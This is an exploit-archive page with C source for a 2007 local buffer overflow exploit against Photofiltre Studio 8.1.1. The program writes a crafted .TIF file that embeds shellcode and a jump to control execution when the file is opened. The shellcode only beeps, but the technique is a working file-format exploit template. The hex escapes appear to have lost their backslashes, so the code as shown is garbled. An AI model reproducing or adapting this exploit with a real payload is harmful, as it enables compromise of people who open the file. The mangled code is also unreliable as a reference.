[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Photofiltre Studio v8.1.1 (.TIF File) Local Buffer Overflow Exploit
# Published : 2007-04-21
# Author : Marsu
# Previous Title : FreshView 7.15 (.PSP File) Buffer Overflow Exploit
# Next Title : MS Windows GDI Local Privilege Escalation Exploit (MS07-017) 2 


/********************************************************************************
*                                                                               *
*            Photofiltre Studio v8.1.1 .TIF File Buffer Overflow                *
*                                                                               *
*                                                                               *
* Photofiltre is vulnerable to an unspecified buffer overflow when processing a *
* crafted .TIF file.                                                            *
* This exploit just beeps (useless but incredibly noisy!!).                     *
*                                                                               *
* Tested against Win XP SP2 FR.                                                 *
* Have Fun!                                                                     *
*                                                                               *
* Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>                    *
********************************************************************************/

#include "stdio.h"
#include "stdlib.h"

// Beep Shellcode, made by xnull
// Woaw this is very ... Hum try it!
unsigned char beepsp2[] =
"x55x89xE5x83xECx18xC7x45xFC"
"x77x7Ax83x7C"                      //Address x77x7Ax83x7C = SP2
"xC7x44x24x04"
"xD0x03"                              //Length xD0x03 = 2000 (2 seconds)
"x00x00xC7x04x24"
"x01x0E"                              //Frequency x01x0E = 3585
"x00x00x8Bx45xFCxFFxD0xC9xC3";

char tif_file_part1[] =
"x49x49x2ax00x08x00x00x00x17x00xfex00x04x00x01x00"
"x00x00x02x00x00x00x00x01x04x00x01x00x00x00xfdx01"
"x00x00x01x01x04x00x01x00x00x00xb6x01x00x00x02x01"
"x03x00x01x00x00x00x08x00x00x00x03x01x03x00x83x00"
"x00x00x05x00x00x00x06x01x03x00x01x00x00x00x03x00"
"x00x00x0ax01xb6x00x01x00x00x00x01x00x00x00x11x01"
"x04x00x37x00x00x00x22x01x00x00x12x01x03x00x01x00"
"x00x00x01x00x00x00x15x01x03x00x01x00x00x00x01x00"
"x00x00x16x01x03x00x01x00x00x00x08x00x00x00x17x01"
"x04x00x37x00x00x00xfex01x00x00x1ax01x05x00x01x00"
"x00x00xdax02x00x00x1bx01x05x00x01x00x00x00xe2x02"
"x00x00x1cx01x03x00x01x00x00x00x01x00x00x00x28x01"
"x03x00x01x00x00x00x02x00x00x00x29x01x03x00x02x00"
"x00x00x00x00x01x00x31x01x02x44x43x42x41x45x45x45"
"x45x45x45x45x45x45x45x45x45x45x45x45x45x45x45x45"
"x45x45x45x45x45x45x45x45x45x45x45x45x45x45x45x45"
"x45x45x45x45x45x45x45x45x45x45x45x45x45x45x45x45"
"x45x45x45x45x45x45x45x45x45x45x45x45x45x45x45x45"
"x45x45x45x45x45x45x45x45x45x45x45x45x45x45x45x45"
"x45x45x45x45x45x45x45x45x45x45x45x46x46x46x46x46"
"x46x46x46x46x46x46x46x46x46x46x46x46x46x46x46x46"
"x46x46x46x46x46x46x46x46x46x46x46x46x46x46x46x46"
"x46x46x46x46x46x46x46x46x46x46x46x46x46x46x46x46"
"x46x46x46x46x46x46x46x46x46x46x46x46x46x46x46x46"
"x47x47x47x47x47x47x47x47x47x47x47x47x47x47x47x47"
"x47x47x47x47x47x47x47x47x47x47x47x47x47x47x47x47"
"x47x47x47x47x47x47x47x47x47x47x47x47x47x47x47x47"
"x47x47x47x47x47x47x47x47x47x47x47x47x47x47x47x47"
"x47x47x47x47x47x47x47x47x47x47x47x47x47x47x47x47"
"x47x47x47x47x47x47x47x48x48x48x48x48x48x48x48x48"
"x48x48x48x48x48x48x48x48x48x48x48x48x48x48x48x48"
"x48x48x48x48x48x48x48x48x48x48x48x48x48x48x48x48"
"x48x48x48x48x48x48x48x48x48x48x48x48x48x48x48x48"
"x48x48x48x48x48x48x48x48x48x48x48x48x48x48x48x48"
"x48x48x48x48x48x48x48x48x48x48x48x48x48x48x48x48"
"x48x48x48x48x48x48x48x49x49x49x49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x49x49x49x49x49"
"x49x4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4a"
"x4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4a"
"x4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4a"
"x4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4a"
"x4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4a"
"x4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4a"
"x4ax4ax4ax4ax4ax4ax4ax4ax4bx4bx4bx4bx4bx4bx4bx4b"
"x4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4b"
"x4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4b"
"x4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4b"
"x4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4b"
"x4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4b"
"x4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4b"
"x4bx4bx4bx4bx4bx4bx4bx4bx4bx4cx4cx4cx4cx4cx4cx4c"
"x4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4c"
"x4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4c"
"x4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4c"
"x4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4c"
"x4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4c"
"x4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4c"
"x4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4c"
"x4cx4cx4cx4cx4cx4cx4dx4dx4dx4dx4dx4dx4dx4dx4dx4d"
"x4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4d"
"x4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4d"
"x4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4d"
"x4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4d"
"x4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4d"
"x4dx4dx4dx4dx4dx4dx4dx4ex4ex4ex4ex4ex4ex4ex4ex4e"
"x4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4e"
"x4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4e"
"x4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4e"
"x4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4e"
"x4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4fx4fx4fx4fx4f"
"x4fx4fx4fx4fx4fx4fx4fx4fx4fx4fx4fx4fx4fx92x00x92"
"x00x96x00x00x00x00x00xafx00x12x00x00x00x92x00x49"
"x00x12x00x92x00xafx00x92x00x49x00x49x00x49x00x58"
"x00xafx00x12x00x58x00x00x00x80x00x00x00x57x00x12"
"x00x5ax00x12x00x00x00x00x00x28x00x12x00x00x00x46"
"x00xfdx00xd5x00x1bx00xffx00xefx00xa9x00xd9x00x00"
"x00x70x00x6cx00xfax00x99x00xc5x00xf7x00xb4x00x48"
"x00xabx00xe9x00xdex00x1bx00xffx00xd7x00x64x00xa9"
"x00xd9x00x6ex00x68x00x70x00x92x00xccx00xf2x00x99"
"x00x94x00xe9x00xadx00xb4x00x4bx00xc9x00x85x00xe9"
"x00xe5x00xb4x00x80x00x98x00x8cx00xe0x00xc4x00x33"
;

int main(int argc, char* argv[])
{
	FILE* tiffile;
	char evilbuff[5000];
	int offset=0;

	printf("[+] Photofiltre Studio v8.1.1 .TIF File Buffer Overflown");
	printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>n");
	if (argc!=2) {
		printf("[+] Usage: %s <file.ttf>n",argv[0]);
		return 0;
	}

	memcpy(evilbuff,tif_file_part1,sizeof(tif_file_part1)-1);
	offset=0xd5;
	memcpy(evilbuff+offset,"x43x43xebx05x8cx08xfcx7fx43",9); //pop pop ret in ??? + jump over EIP
	memcpy(evilbuff+offset+9,beepsp2,sizeof(beepsp2)-1);

	printf("[+] tif_file_part2 patched!n");
	
	if ((tiffile=fopen(argv[1],"wb"))==0) {
		printf("[-] Unable to access file.n");
		return 0;
	}
	
	fwrite( evilbuff, 1, 1360, tiffile );
	fclose(tiffile);
	printf("[+] Done. Have fun!n");
	return 0;
	
}

// www.Syue.com [2007-04-21]